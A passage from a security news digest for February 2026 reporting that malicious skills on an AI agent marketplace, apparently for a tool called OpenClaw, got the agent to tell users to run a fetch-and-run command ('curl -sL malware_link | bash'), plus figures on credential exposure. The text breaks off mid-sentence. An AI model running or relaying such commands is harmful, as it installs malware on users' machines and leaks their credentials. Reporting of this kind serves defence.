Week in Security: OpenClaw's Dumpster Fire and Other Lessons

Week in Security: February 15-21, 2026 This week was dominated by AI agent security disasters, the inevitable collapse of "trust us bro" password manager marketing, and the realization that container escapes aren't a kernel problem—they're a "we built too much abstraction" problem. The through line: convenience keeps winning until it catastrophically loses. OpenClaw Is a Security Dumpster Fire (And Everyone Knew) The #1 ranked skill on ClawHub was malware. Not a bug, not a vulnerability—actual malware that told users to run curl -sL malware_link | bash . The AI became the social engineer. Koi Security found 1,184 malicious skills total; Snyk scanned ~4,000 skills and found 283 (7.1%) exposing credentials in plaintext, including credit card numbers passed through LLM context windows. Why this matters: This isn't a "patch it" situation. Full read/write access + untrusted input ingestion + zero-moderation skill marketplace = unfixable threat model with current LLM tech. Laurie Voss (found

Week in Security: OpenClaw's Dumpster Fire and Other Lessons

Related Articles

5 gadgets I'm buying this spring to grow my green thumb (and they're still discounted)

The Graph Problems You’re Already Solving (Just Badly)

If-Else Is Killing Your Code — Here’s What Senior Developers Do Differently

Why Software Gets Harder to Change Long Before It Breaks

These 7 wellness gadgets helped me become more mindful (and they're still on sale)

Related Articles

News
5 gadgets I'm buying this spring to grow my green thumb (and they're still discounted)
ZDNet • 5h ago

News
The Graph Problems You’re Already Solving (Just Badly)
Medium Programming • 5h ago

News
If-Else Is Killing Your Code — Here’s What Senior Developers Do Differently
Medium Programming • 5h ago

News
Why Software Gets Harder to Change Long Before It Breaks
Medium Programming • 5h ago

News
These 7 wellness gadgets helped me become more mindful (and they're still on sale)
ZDNet • 6h ago